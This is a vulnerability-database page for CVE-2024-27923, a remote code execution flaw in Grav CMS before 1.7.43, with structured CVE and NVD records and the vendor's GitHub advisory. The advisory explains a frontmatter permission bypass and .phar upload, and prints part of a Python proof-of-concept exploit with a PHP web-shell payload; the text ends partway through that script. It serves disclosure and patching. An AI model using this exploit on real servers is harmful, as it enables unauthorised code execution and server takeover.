CVE-2024-27923 (GCVE-0-2024-27923)

Vulnerability from cvelistv5

Published

2024-03-06 20:28

Modified

2024-08-02 18:35

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-287 - Improper Authentication
CWE-434 - Unrestricted Upload of File with Dangerous Type

Summary

Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue.

References

URL

Tags

security-advisories@github.com	https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	getgrav	grav	Version: < 1.7.43

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:41:55.863Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "grav",
            "vendor": "getgrav",
            "versions": [
              {
                "lessThan": "1.7.43",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27923",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-02T18:34:03.665942Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-02T18:35:36.095Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "grav",
          "vendor": "getgrav",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.7.43"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287: Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-03-06T20:28:46.695Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
        },
        {
          "name": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
        }
      ],
      "source": {
        "advisory": "GHSA-f6g2-h7qv-3m5v",
        "discovery": "UNKNOWN"
      },
      "title": "Remote Code Execution by uploading a phar file using frontmatter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-27923",
    "datePublished": "2024-03-06T20:28:46.695Z",
    "dateReserved": "2024-02-28T15:14:14.214Z",
    "dateUpdated": "2024-08-02T18:35:36.095Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-27923\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-03-21T02:52:21.280\",\"lastModified\":\"2025-01-02T23:02:44.890\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue.\"},{\"lang\":\"es\",\"value\":\"Grav es un sistema de gesti\u00f3n de contenidos (CMS). Antes de la versi\u00f3n 1.7.43, los usuarios que pod\u00edan escribir una p\u00e1gina pod\u00edan usar la funci\u00f3n \\\"frontmatter\\\" debido a una validaci\u00f3n de permisos insuficiente y una validaci\u00f3n de nombre de archivo inadecuada. Esto puede provocar la ejecuci\u00f3n remota de c\u00f3digo. La versi\u00f3n 1.7.43 soluciona este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-434\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.7.43\",\"matchCriteriaId\":\"137FDC94-AAD3-4371-8E1C-2D01E0305DAB\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Remote Code Execution by uploading a phar file using frontmatter\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-287\", \"lang\": \"en\", \"description\": \"CWE-287: Improper Authentication\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-434\", \"lang\": \"en\", \"description\": \"CWE-434: Unrestricted Upload of File with Dangerous Type\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\"}, {\"name\": \"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\"}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"version\": \"\u003c 1.7.43\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-03-06T20:28:46.695Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue.\"}], \"source\": {\"advisory\": \"GHSA-f6g2-h7qv-3m5v\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T00:41:55.863Z\"}, \"title\": \"CVE Program Container\", \"references\": [{\"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"], \"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v\"}, {\"name\": \"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"], \"url\": \"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07\"}]}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-27923\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-02T18:34:03.665942Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\"], \"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.7.43\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-02T18:35:31.976Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-27923\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2024-02-28T15:14:14.214Z\", \"datePublished\": \"2024-03-06T20:28:46.695Z\", \"dateUpdated\": \"2024-08-02T18:35:36.095Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

gsd-2024-27923

Vulnerability from gsd

Modified

2024-02-29 06:03

Details

Aliases

CVE-2024-27923

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-27923"
      ],
      "details": "Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue.",
      "id": "GSD-2024-27923",
      "modified": "2024-02-29T06:03:30.063600Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2024-27923",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "grav",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 1.7.43"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "getgrav"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-287",
                "lang": "eng",
                "value": "CWE-287: Improper Authentication"
              }
            ]
          },
          {
            "description": [
              {
                "cweId": "CWE-434",
                "lang": "eng",
                "value": "CWE-434: Unrestricted Upload of File with Dangerous Type"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-f6g2-h7qv-3m5v",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "descriptions": [
          {
            "lang": "en",
            "value": "Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue."
          },
          {
            "lang": "es",
            "value": "Grav es un sistema de gesti\u00f3n de contenidos (CMS). Antes de la versi\u00f3n 1.7.43, los usuarios que pod\u00edan escribir una p\u00e1gina pod\u00edan usar la funci\u00f3n \"frontmatter\" debido a una validaci\u00f3n de permisos insuficiente y una validaci\u00f3n de nombre de archivo inadecuada. Esto puede provocar la ejecuci\u00f3n remota de c\u00f3digo. La versi\u00f3n 1.7.43 soluciona este problema."
          }
        ],
        "id": "CVE-2024-27923",
        "lastModified": "2024-03-21T12:58:51.093",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 2.8,
              "impactScore": 5.9,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2024-03-21T02:52:21.280",
        "references": [
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Awaiting Analysis",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-287"
              },
              {
                "lang": "en",
                "value": "CWE-434"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Secondary"
          }
        ]
      }
    }
  }
}

fkie_cve-2024-27923

Vulnerability from fkie_nvd

Published

2024-03-21 02:52

Modified

2025-01-02 23:02

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	getgrav	grav	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "137FDC94-AAD3-4371-8E1C-2D01E0305DAB",
              "versionEndExcluding": "1.7.43",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue."
    },
    {
      "lang": "es",
      "value": "Grav es un sistema de gesti\u00f3n de contenidos (CMS). Antes de la versi\u00f3n 1.7.43, los usuarios que pod\u00edan escribir una p\u00e1gina pod\u00edan usar la funci\u00f3n \"frontmatter\" debido a una validaci\u00f3n de permisos insuficiente y una validaci\u00f3n de nombre de archivo inadecuada. Esto puede provocar la ejecuci\u00f3n remota de c\u00f3digo. La versi\u00f3n 1.7.43 soluciona este problema."
    }
  ],
  "id": "CVE-2024-27923",
  "lastModified": "2025-01-02T23:02:44.890",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-03-21T02:52:21.280",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        },
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

ghsa-f6g2-h7qv-3m5v

Vulnerability from github

Published

2024-03-06 16:58

Modified

2024-03-06 16:58

Summary

Remote Code Execution by uploading a phar file using frontmatter

Details

Summary

Due to insufficient permission verification, user who can write a page use frontmatter feature.
Inadequate File Name Validation

Details

Insufficient Permission Verification

In Grav CMS, "Frontmatter" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post. In this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. Video Link

Inadequate File Name Validation

To create a Contact Form, Frontmatter and markdown can be written as follows: Contact Form Example Form Action Save Option When an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of "feedback.txt," a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the "name" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the "name" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. Disable XSS

```

title: Contact Form

form: name: contact xss_check: false

fields:
    name:
      label: Name
      placeholder: Enter your name
      autocomplete: on
      type: text
      validate:
        required: true

buttons:
    submit:
      type: submit
      value: Submit

process:
    save:
        filename: this_is_file_name.phar
        operation: add

Contact form

Some sample page content ```

Exploiting these two vulnerabilities allows the following scenario:

A regular user account capable of creating pages is required.
An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.
Accessing the Contact Form page, the attacker submits PHP code.
The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].

PoC

PoC Video Link

```python

PoC.py

import requests from bs4 import BeautifulSoup

class Poc:

def __init__(self, cmd):
    self.sess = requests.Session()

    ##########    INIT    ################
    self.USERNAME = "guest"
    self.PASSWORD = "Guest123!"
    self.PREFIX_URL = "http://192.168.12.119:8888/grav"
    self.PAGE_NAME = "this_is_poc_page47"
    self.PHP_FILE_NAME = "universe.phar"
    self.PAYLOAD = '<?php system($_GET["cmd"]); ?>'
    self.cmd = cmd
    ##########    END    ################

    self.sess.get(self.PREFIX_URL)
    self._login()
    self._save_page()
    self._inject_command()
    self._execute_command()


def _get_nonce(self, data, name):
    # Get login nonce value
    res = BeautifulSoup(data, "html.parser")
    return res.find("input", {"name" : name}).get("value")


def _login(self):
    print("[*] Try to Login")
    res = self.sess.get(self.PREFIX_URL + "/admin")

    login_nonce = self._get_nonce(res.text, "login-nonce")

    # Login
    login_data = {
        "data[username]" : self.USERNAME,
        "data[password]" : self.PASSWORD,
        "task" : "login",
        "login-nonce" : login_nonce
    }
    res = self.sess.post(self.PREFIX_URL + "/admin", data=login_data)

    # Check login
    if res.status_code != 303:
        print("[!] username or password is wrong")
        exit()

    print("[*] Success Login")


def _save_page(self):
    print("[*] Try to write page")

    res = self.sess.get(self.PREFIX_URL + f"/admin/pages/{self.PAGE_NAME}/:add")
    form_nonce = self._get_nonce(res.text, "form-nonce")
    unique_form_id = self._get_nonce(res.text, "__unique_form_id__")

    # Add page data
    page_data  = f"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0"
    page_data += f"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D"
    res = self.sess.post(self.PREFIX_URL + f"/admin/pages/{self.PAGE_NAME}/:add" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})

    print("[*] Success write page: " + self.PREFIX_URL + f"/{self.PAGE_NAME}")


def _inject_command(self):
    print("[*] Try to inject php code")

